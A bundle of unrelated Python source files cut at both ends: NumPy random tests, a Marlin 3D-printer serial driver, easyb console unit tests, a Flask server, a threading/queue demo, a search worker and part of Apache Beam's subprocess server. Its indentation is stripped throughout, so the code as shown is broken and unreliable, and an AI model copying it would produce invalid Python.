if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
|
printer.py
|
import os
import logging
from threading import Thread, Event, Lock
from time import sleep, time
import serial
# for python 2/3 compatibility
try:
reduce
except NameError:
# In python 3, reduce is no longer imported by default.
from functools import reduce
try:
isinstance("", basestring)
def is_str(s):
return isinstance(s, basestring)
def encode2To3(s):
return s
def decode2To3(s):
return s
except NameError:
def is_str(s):
return isinstance(s, str)
def encode2To3(s):
return bytes(s, 'UTF-8')
def decode2To3(s):
return s.decode('UTF-8')
HERE = os.path.dirname(os.path.abspath(__file__))
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
#logger.addHandler(logging.StreamHandler())
#fh = logging.FileHandler(os.path.join(HERE, 'voxelface.log'))
#fh.setFormatter(logging.Formatter('%(asctime)s - %(threadName)s - %(levelname)s - %(message)s'))
#logger.addHandler(fh)
class Printer(object):
""" The Printer object is responsible for serial communications with a
printer. The printer is expected to be running Marlin firmware.
"""
def __init__(self, port='/dev/tty.usbmodem1421', baudrate=250000):
# USB port and baudrate for communication with the printer.
self.port = port
self.baudrate = baudrate
# The Serial object that the printer is communicating on.
self.s = None
# List of the responses from the printer.
self.responses = []
# List of lines that were sent to the printer.
self.sentlines = []
# True if the print thread is alive and sending lines.
self.printing = False
# Set to True to pause the print.
self.paused = False
# If set to True, the read_thread will be closed as soon as possible.
self.stop_reading = False
# If set to True, the print_thread will be closed as soon as possible.
self.stop_printing = False
# List of all temperature string responses from the printer.
self.temp_readings = []
### Private Attributes ################################################
# List of all lines to be sent to the printer.
self._buffer = []
# Index into the _buffer of the next line to send to the printer.
self._current_line_idx = 0
# This thread continuously sends lines as they appear in self._buffer.
self._print_thread = None
# This thread continuously reads lines as they appear from the printer.
self._read_thread = None
# Flag used to synchronize the print_thread and the read_thread. An 'ok'
# needs to be returned for every line sent. When the print_thread sends
# a line this flag is cleared, and when an 'ok' is received it is set.
self._ok_received = Event()
self._ok_received.set()
# Lock used to ensure serial send/receive events are atomic with the
# setting/clearing of the `_ok_received` flag.
self._communication_lock = Lock()
# Lock used to ensure connecting and disconnecting is atomic.
self._connection_lock = Lock()
# If False the Printer instacnce does not own the serial object passed
# in and it should not be closed when finished with.
self._owns_serial = True
# This is set to true when a disconnect was requested. If a sendline is
# called while this is true an error is raised.
self._disconnect_pending = False
# When we reset the line number Marlin's internal number will differ
# from our own _current_line_idx. This offset is used to keep those two
# in sync.
self._reset_offset = 0
### Printer Interface ###################################################
def connect(self, s=None):
""" Instantiate a Serial object using the stored port and baudrate.
Parameters
----------
s : serial.Serial
If a serial object is passed in then it will be used instead of
creating a new one.
"""
with self._connection_lock:
if s is None:
self.s = serial.Serial(self.port, self.baudrate, timeout=3)
else:
self.s = s
self._owns_serial = False
self._ok_received.set()
self._current_line_idx = 0
self._buffer = []
self.responses = []
self.sentlines = []
self._disconnect_pending = False
self._start_read_thread()
if s is None:
while len(self.responses) == 0:
sleep(0.01) # wait until the start message is recieved.
self.responses = []
logger.debug('Connected to {}'.format(self.s))
def disconnect(self, wait=False):
""" Disconnect from the printer by stopping threads and closing the port
Parameters
----------
wait : Bool (default: False)
If true, this method waits until all lines in the buffer have been
sent and acknowledged before disconnecting. Clearing the buffer
isn't guaranteed. If the read thread isn't running for some reason,
this function may return without waiting even when wait is set to
True.
"""
with self._connection_lock:
self._disconnect_pending = True
if wait:
buf_len = len(self._buffer)
while buf_len > len(self.responses) and \
self._is_read_thread_running():
sleep(0.01) # wait until all lines in the buffer are sent
if self._print_thread is not None:
self.stop_printing = True
if self.s is not None and self.s.writeTimeout is not None:
timeout = self.s.writeTimeout + 1
else:
timeout = 10
self._print_thread.join(timeout)
if self._read_thread is not None:
self.stop_reading = True
if self.s is not None and self.s.timeout is not None:
timeout = self.s.timeout + 1
else:
timeout = 10
self._read_thread.join(timeout)
if self.s is not None and self._owns_serial is True:
self.s.close()
self.s = None
self.printing = False
self._current_line_idx = 0
self._buffer = []
self.responses = []
self.sentlines = []
logger.debug('Disconnected from printer')
def load_file(self, filepath):
""" Load the given file into an internal _buffer. The lines will not be
send until `self._start_print_thread()` is called.
Parameters
----------
filepath : str
The path to a text file containing lines of GCode to be printed.
"""
lines = []
with open(filepath) as f:
for line in f:
line = line.strip()
if ';' in line: # clear out the comments
line = line.split(';')[0]
if line:
lines.append(line)
self._buffer.extend(lines)
def start(self):
""" Starts the read_thread and the _print_thread.
"""
self._start_read_thread()
self._start_print_thread()
def sendline(self, line):
""" Send the given line over serial by appending it to the send buffer
Parameters
----------
line : str
A line of GCode to send to the printer.
"""
if self._disconnect_pending:
msg = 'Attempted to send line after a disconnect was requested: {}'
raise RuntimeError(msg.format(line))
if line:
line = str(line).strip()
if ';' in line: # clear out the comments
line = line.split(';')[0]
if line:
self._buffer.append(line)
def get_response(self, line, timeout=0):
""" Send the given line and return the response from the printer.
Parameters
----------
line : str
The line to send to the printer
Returns
-------
r : str
The response from the printer.
"""
buf_len = len(self._buffer) + 1
self.sendline(line)
start_time = time()
while len(self.responses) != buf_len:
if len(self.responses) > buf_len:
msg = "Received more responses than lines sent"
raise RuntimeError(msg)
if timeout > 0 and (time() - start_time) > timeout:
return '' # return blank string on timeout.
if not self._is_read_thread_running():
raise RuntimeError("can't get response from serial since read thread isn't running")
sleep(0.01)
return self.responses[-1]
def current_position(self):
""" Get the current postion of the printer.
Returns
-------
pos : dict
Dict with keys of 'X', 'Y', 'Z', and 'E' and values of their
positions
"""
# example r: X:0.00 Y:0.00 Z:0.00 E:0.00 Count X: 0.00 Y:0.00 Z:0.00
r = self.get_response("M114")
r = r.split(' Count')[0].strip().split()
r = [x.split(':') for x in r]
pos = dict([(k, float(v)) for k, v in r])
return pos
def reset_linenumber(self, number = 0):
line = "M110 N{}".format(number)
self.sendline(line)
### Private Methods ######################################################
def _start_print_thread(self):
""" Spawns a new thread that will send all lines in the _buffer over
serial to the printer. This thread can be stopped by setting
`stop_printing` to True. If a print_thread already exists and is alive,
this method does nothing.
"""
if self._is_print_thread_running():
return
self.printing = True
self.stop_printing = False
self._print_thread = Thread(target=self._print_worker_entrypoint, name='Print')
self._print_thread.setDaemon(True)
self._print_thread.start()
logger.debug('print_thread started')
def _start_read_thread(self):
""" Spawns a new thread that will continuously read lines from the
printer. This thread can be stopped by setting `stop_reading` to True.
If a print_thread already exists and is alive, this method does
nothing.
"""
if self._is_read_thread_running():
return
self.stop_reading = False
self._read_thread = Thread(target=self._read_worker_entrypoint, name='Read')
self._read_thread.setDaemon(True)
self._read_thread.start()
logger.debug('read_thread started')
def _print_worker_entrypoint(self):
try:
self._print_worker()
except Exception as e:
logger.exception("Exception running print worker: " + str(e))
def _read_worker_entrypoint(self):
try:
self._read_worker()
except Exception as e:
logger.exception("Exception running read worker: " + str(e))
def _is_print_thread_running(self):
return self._print_thread is not None and self._print_thread.is_alive()
def _is_read_thread_running(self):
return self._read_thread is not None and self._read_thread.is_alive()
def _print_worker(self):
""" This method is spawned in the print thread. It loops over every line
in the _buffer and sends it over serial to the printer.
"""
while not self.stop_printing:
_paused = False
while self.paused is True and not self.stop_printing:
if _paused is False:
logger.debug('Printer.paused is True, waiting...')
_paused = True
sleep(0.01)
if _paused is True:
logger.debug('Printer.paused is now False, resuming.')
if self._current_line_idx < len(self._buffer):
self.printing = True
while not self._ok_received.is_set() and not self.stop_printing:
self._ok_received.wait(1)
line = self._next_line()
with self._communication_lock:
self.s.write(encode2To3(line))
self._ok_received.clear()
self._current_line_idx += 1
# Grab the just sent line without line numbers or checksum
plain_line = self._buffer[self._current_line_idx - 1].strip()
self.sentlines.append(plain_line)
else: # if there aren't new lines wait 10ms and check again
sleep(0.01)
self.printing = False
def _read_worker(self):
""" This method is spawned in the read thread. It continuously reads
from the printer over serial and checks for 'ok's.
"""
full_resp = ''
while not self.stop_reading:
if self.s is not None:
line = decode2To3(self.s.readline())
if line.startswith('Resend: '): # example line: "Resend: 143"
self._current_line_idx = int(line.split()[1]) - 1 + self._reset_offset
logger.debug('Resend Requested - {}'.format(line.strip()))
with self._communication_lock:
self._ok_received.set()
continue
if line.startswith('T:'):
self.temp_readings.append(line)
if line:
full_resp += line
# If there is no newline char in the response that means
# serial.readline() hit the timeout before a full line. This
# means communication has broken down so both threads need
# to be closed down.
if '\n' not in line:
self.printing = False
self.stop_printing = True
self.stop_reading = True
with self._communication_lock:
self._ok_received.set()
msg = """readline timed out mid-line.
last sentline: {}
response: {}
"""
raise RuntimeError(msg.format(self.sentlines[-1:],
full_resp))
if 'ok' in line:
with self._communication_lock:
self._ok_received.set()
self.responses.append(full_resp)
full_resp = ''
else: # if no printer is attached, wait 10ms to check again.
sleep(0.01)
def _next_line(self):
""" Prepares the next line to be sent to the printer by prepending the
line number and appending a checksum and newline character.
"""
line = self._buffer[self._current_line_idx].strip()
if line.startswith('M110 N'):
new_number = int(line[6:])
self._reset_offset = self._current_line_idx + 1 - new_number
elif line.startswith('M110'):
self._reset_offset = self._current_line_idx + 1
idx = self._current_line_idx + 1 - self._reset_offset
line = 'N{} {}'.format(idx, line)
checksum = self._checksum(line)
return '{}*{}\n'.format(line, checksum)
def _checksum(self, line):
""" Calclate the checksum by xor'ing all characters together.
"""
if not line:
raise RuntimeError("cannot compute checksum of an empty string")
return reduce(lambda a, b: a ^ b, [ord(char) for char in line])
|
__init__.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Copyright (C) 2017, Kai Raphahn <kai.raphahn@laburec.de>
#
import os
import time
import unittest
import unittest.mock as mock
from easyb.console import Console
from serial import SerialException
import threading
import easyb
from easyb.logging import SerialLogging
from tests.console.options import TestOptions
__all__ = [
"options",
"serial",
"TestConsole"
]
from tests.console.serial import TestserialPrepare11, TestserialRun1, TestserialClose1, TestserialRunContinuously
mock_serial = mock.Mock()
mock_serial_2 = mock.Mock()
old_logging = easyb.log
new_logging = SerialLogging()
new_logging.setup(app="Device", level=2)
cons = new_logging.get_writer("console")
cons.index.append("SERIAL")
# noinspection PyUnresolvedReferences
cons.add_style("SERIAL", "BRIGHT", "YELLOW", "")
cons.setup(text_space=15, error_index=["ERROR", "EXCEPTION"])
new_logging.register(cons)
new_logging.open()
# noinspection DuplicatedCode
class TestConsole(unittest.TestCase):
def setUp(self):
easyb.set_logging(new_logging)
return
def tearDown(self):
easyb.set_logging(old_logging)
return
def test_constructor(self):
console = Console()
self.assertIsNone(console.device)
self.assertIsNone(console.options)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_1(self):
option = TestOptions()
option.test_1()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertTrue(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_2(self):
"""tear down test.
"""
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (None, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_3(self):
"""tear down test.
"""
option = TestOptions()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_4(self):
"""tear down test.
"""
option = TestOptions()
option.test_2()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_5(self):
"""tear down test.
"""
option = TestOptions()
option.test_3()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_6(self):
"""tear down test.
"""
option = TestOptions()
option.test_4()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_7(self):
"""tear down test.
"""
option = TestOptions()
option.test_5()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_8(self):
"""tear down test.
"""
option = TestOptions()
option.test_6()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertTrue(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_9(self):
"""tear down test.
"""
option = TestOptions()
option.test_7()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial.open',
new=mock.Mock(side_effect=SerialException('Attempting to use a port that is not open')))
def test_prepare_10(self):
option = TestOptions()
option.test_1()
# mock_serial_2.open = mock.Mock(side_effect=SerialException('Attempting to use a port that is not open'))
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=TestserialPrepare11)
def test_prepare_11(self):
option = TestOptions()
option.test_8()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertTrue(check)
return
@mock.patch('easyb.device.Serial', new=TestserialPrepare11)
def test_list_commands_01(self):
option = TestOptions()
option.test_9()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialPrepare11)
def test_list_commands_02(self):
option = TestOptions()
option.test_10()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialPrepare11)
def test_list_commands_03(self):
option = TestOptions()
option.test_11()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialRun1)
def test_run_1(self):
"""tear down test.
"""
option = TestOptions()
option.test_1()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
self.assertTrue(check1)
self.assertTrue(check2)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_run_2(self):
"""tear down test.
"""
option = TestOptions()
option.test_6()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
self.assertTrue(check1)
self.assertTrue(check2)
return
@mock.patch('easyb.device.Serial', new=TestserialClose1)
def test_close_1(self):
"""tear down test.
"""
option = TestOptions()
option.test_1()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialRunContinuously)
def test_run_continuously_1(self):
"""tear down test.
"""
option = TestOptions()
option.test_12()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
thread = threading.Thread(target=console.run)
thread.start()
time.sleep(8)
console.device.abort = True
while True:
if console.device.active is False:
break
time.sleep(0.1)
check2 = console.device.status
console.device.serial.read_run = 0
console.device.serial.write_run = 0
console.device.serial.read_data = [
[0xfe, 0x33, 0xa4],
[0xff, 0x00, 0x28],
[0xfe, 0x65, 0x01],
[0x71, 0x00, 0x48, 0xf9, 0xed, 0xdb],
[0xfe, 0x75, 0x71],
[0x71, 0x00, 0x48, 0xf8, 0x61, 0x63]
]
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialRunContinuously)
def test_run_continuously_2(self):
"""tear down test.
"""
option = TestOptions()
option.test_12()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
thread = threading.Thread(target=console.run)
thread.start()
time.sleep(8)
console.device.abort = True
while True:
if console.device.active is False:
break
time.sleep(0.1)
check2 = console.device.status
console.device.serial.read_run = 0
console.device.serial.write_run = 0
console.device.serial.read_data = [
[0xfe, 0x33, 0xa4],
[0xff, 0x00, 0x28],
[0xfe, 0x0d, 0x1e],
[0x70, 0xf6, 0x91, 0xdf, 0xed, 0x0b],
[0xfe, 0x0d, 0x1e],
[0x70, 0xf6, 0x91, 0xdf, 0xed, 0x0b]
]
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertFalse(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialRunContinuously)
def test_run_continuously_3(self):
"""tear down test.
"""
option = TestOptions()
option.test_13()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
thread = threading.Thread(target=console.run)
thread.start()
time.sleep(8)
console.device.abort = True
while True:
if console.device.active is False:
break
time.sleep(0.1)
check2 = console.device.status
console.device.serial.read_run = 0
console.device.serial.write_run = 0
console.device.serial.read_data = [
[0xfe, 0x33, 0xa4],
[0xff, 0x00, 0x28],
[0xfe, 0x65, 0x01],
[0x71, 0x00, 0x48, 0xf9, 0xed, 0xdb],
[0xfe, 0x75, 0x71],
[0x71, 0x00, 0x48, 0xf8, 0x61, 0x63]
]
check3 = console.close()
check4 = os.path.exists("TEST.xlsx")
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
self.assertTrue(check4)
return
|
server.py
|
import sys
import os
from datetime import timedelta
import threading
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(os.path.split(rootPath)[0])
from src.web.web_util.web_util import judge_pool, get_redis_conn, begin_check_redis
from flask import Flask, render_template, session
from src.web.controller.dataController import data, POOL_FLAG
from src.web.controller.spiderController import spider
from src.util.constant import WAITING_USER_LIST
from flask_cors import *
app = Flask(__name__)
CORS(app, supports_credentials=True) # 设置跨域
app.config['SECRET_KEY'] = os.urandom(24)
app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(days=7)
host = judge_pool()
conn = get_redis_conn(host)
conn.delete(WAITING_USER_LIST)
@app.route('/')
def config():
session[POOL_FLAG] = judge_pool()
print("pool flag:", session.get(POOL_FLAG))
return render_template("config.html")
@app.route('/error')
def error():
return render_template("error.html")
@app.route('/cookie')
def cookie():
return render_template("cookie.html")
app.register_blueprint(spider, url_prefix='/spider')
app.register_blueprint(data, url_prefix='/data')
if __name__ == '__main__':
t = threading.Thread(target=begin_check_redis)
t.start()
app.run(host='0.0.0.0', port=5000, debug=False)
|
withqueue.py
|
import threading, time, random, queue
##########################################################################################
# Fuzzing is a technique for amplifying race condition errors to make them more visible
FUZZ = True
def fuzz():
if FUZZ:
time.sleep(random.random())
###########################################################################################
counter = 0
counter_queue = queue.Queue()
def counter_manager():
'I have EXCLUSIVE rights to update the counter variable'
global counter
while True:
increment = counter_queue.get()
fuzz()
oldcnt = counter
fuzz()
counter = oldcnt + increment
fuzz()
fuzz()
counter_queue.task_done()
print_queue.put([
'The count is %d' % counter,
'---------------'])
t = threading.Thread(target=counter_manager)
t.daemon = True
t.start()
del t
###########################################################################################
print_queue = queue.Queue()
def print_manager():
'I have EXCLUSIVE rights to call the "print" keyword'
while True:
job = print_queue.get()
fuzz()
for line in job:
print(line, end='')
fuzz()
print()
fuzz()
print_queue.task_done()
fuzz()
t = threading.Thread(target=print_manager)
t.daemon = True
t.start()
del t
###########################################################################################
def worker():
'My job is to increment the counter and print the current count'
counter_queue.put(1)
fuzz()
print_queue.put(['Starting up'])
fuzz()
worker_threads = []
for i in range(10):
t = threading.Thread(target=worker)
worker_threads.append(t)
t.start()
fuzz()
for t in worker_threads:
fuzz()
t.join()
counter_queue.join()
fuzz()
print_queue.put(['Finishing up'])
fuzz()
print_queue.join()
fuzz()
|
worker.py
|
import logging
import queue
import threading
from time import sleep
from searchzone.tasks.helper import read_file_and_add_to_queue
from searchzone.elastic.appsearch import AppSearchConnector
from searchzone.tasks.update import outdated
from searchzone.tasks.new import new
from searchzone.tasks.diff import diff
from searchzone.tasks.delete import delete
from searchzone.tasks.email import email
LOGGER = logging.getLogger(__name__)
class Worker:
def __init__(self, url, engine, key, file=None):
self.url = url
self.engine = engine
self.key = key
self.file = file
self.appsearch = AppSearchConnector(self.url, self.key, self.engine)
self.domain_queue = queue.Queue()
LOGGER.debug('Performing requests on: %s engine: %s with file: %s', self.url, self.engine, self.file)
def update(self):
for _ in range(10):
threading.Thread(target=new, args=[self.appsearch, self.domain_queue, False], daemon=True).start()
self.domain_queue.join()
for i in range(2500):
LOGGER.info('Starting updating 1000 users to %d', i * 1000)
outdated(self.appsearch, self.domain_queue)
LOGGER.info('Sleeping for 300 seconds to let elastic and threads do their job')
sleep(300)
def new(self):
LOGGER.info('Starting threads for Action NEW')
read_file_and_add_to_queue(self.domain_queue, self.file)
for _ in range(10):
threading.Thread(target=new, args=[self.appsearch, self.domain_queue, True], daemon=True).start()
self.domain_queue.join()
def diff(self):
LOGGER.info('Starting threads for Action DIFF')
read_file_and_add_to_queue(self.domain_queue, self.file)
for _ in range(10):
threading.Thread(target=diff, args=[self.appsearch, self.domain_queue], daemon=True).start()
self.domain_queue.join()
def delete(self):
LOGGER.info('Delete')
read_file_and_add_to_queue(self.domain_queue, self.file)
for _ in range(10):
threading.Thread(target=delete, args=[self.appsearch, self.domain_queue], daemon=True).start()
self.domain_queue.join()
def email(self):
LOGGER.info('email')
read_file_and_add_to_queue(self.domain_queue, self.file)
for _ in range(10):
threading.Thread(target=email, args=[self.appsearch, self.domain_queue], daemon=True).start()
self.domain_queue.join()
|
subprocess_server.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
import contextlib
import logging
import os
import re
import shutil
import signal
import socket
import subprocess
import tempfile
import threading
import time
import grpc
from future.moves.urllib.error import URLError
from future.moves.urllib.request import urlopen
from apache_beam.version import __version__ as beam_version
_LOGGER = logging.getLogger(__name__)
class SubprocessServer(object):
"""An abstract base class for running GRPC Servers as an external process.
This class acts as a context which will start up a server, provides a stub
to connect to it, and then shuts the server down. For example::
with SubprocessServer(GrpcStubClass, [executable, arg, ...]) as stub:
stub.CallService(...)
"""
def __init__(self, stub_class, cmd, port=None):
"""Creates the server object.
:param stub_class: the auto-generated GRPC client stub class used for
connecting to the GRPC service
:param cmd: command (including arguments) for starting up the server,
suitable for passing to `subprocess.POpen`.
:param port: (optional) the port at which the subprocess will serve its
service. If not given, one will be randomly chosen and the special
string "{{PORT}}" will be substituted in the command line arguments
with the chosen port.
"""
self._process_lock = threading.RLock()
self._process = None
self._stub_class = stub_class
self._cmd = [str(arg) for arg in cmd]
self._port = port
def __enter__(self):
return self.start()
def __exit__(self, *unused_args):
self.stop()
def start(self):
try:
endpoint = self.start_process()
wait_secs = .1
channel_options = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
channel = grpc.insecure_channel(endpoint, options=channel_options)
channel_ready = grpc.channel_ready_future(channel)
while True:
if self._process is not None and self._process.poll() is not None:
_LOGGER.error("Starting job service with %s", self._process.args)
raise RuntimeError(
'Service failed to start up with error %s' % self._process.poll())
try:
channel_ready.result(timeout=wait_secs)
break
except (grpc.FutureTimeoutError, grpc.RpcError):
wait_secs *= 1.2
logging.log(
logging.WARNING if wait_secs > 1 else logging.DEBUG,
'Waiting for grpc channel to be ready at %s.',
endpoint)
return self._stub_class(channel)
except: # pylint: disable=bare-except
_LOGGER.exception("Error bringing up service")
self.stop()
raise
def start_process(self):
with self._process_lock:
if self._process:
self.stop()
if self._port:
port = self._port
cmd = self._cmd
else:
port, = pick_port(None)
cmd = [arg.replace('{{PORT}}', str(port)) for arg in self._cmd]
endpoint = 'localhost:%s' % port
_LOGGER.info("Starting service with %s", str(cmd).replace("',", "'"))
self._process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# Emit the output of this command as info level logging.
def log_stdout():
line = self._process.stdout.readline()
while line:
# Remove newline via rstrip() to not print an empty line
_LOGGER.info(line.rstrip())
line = self._process.stdout.readline()
t = threading.Thread(target=log_stdout)
t.daemon = True
t.start()
return endpoint
def stop(self):
self.stop_process()
def stop_process(self):
with self._process_lock:
if not self._process:
return
for _ in range(5):
if self._process.poll() is not None:
break
logging.debug("Sending SIGINT to job_server")
self._process.send_signal(signal.SIGINT)
time.sleep(1)
if self._process.poll() is None:
self._process.kill()
self._process = None
def local_temp_dir(self, **kwargs):
return tempfile.mkdtemp(dir=self._local_temp_root, **kwargs)
class JavaJarServer(SubprocessServer):
APACHE_REPOSITORY = 'https://repo.maven.apache.org/maven2'
BEAM_GROUP_ID = 'org.apache.beam'
JAR_CACHE = os.path.expanduser("~/.apache_beam/cache/jars")
_BEAM_SERVICES = type(
'local', (threading.local, ),
dict(__init__=lambda self: setattr(self, 'replacements', {})))()
def __init__(self, stub_class, path_to_jar, java_arguments):
super(JavaJarServer, self).__init__(
stub_class, ['java', '-jar', path_to_jar] + list(java_arguments))
self._existing_service = path_to_jar if _is_service_endpoint(
path_to_jar) else None
def start_process(self):
if self._existing_service:
return self._existing_service
else:
if not shutil.which('java'):
raise RuntimeError(
'Java must be installed on this system to use this '
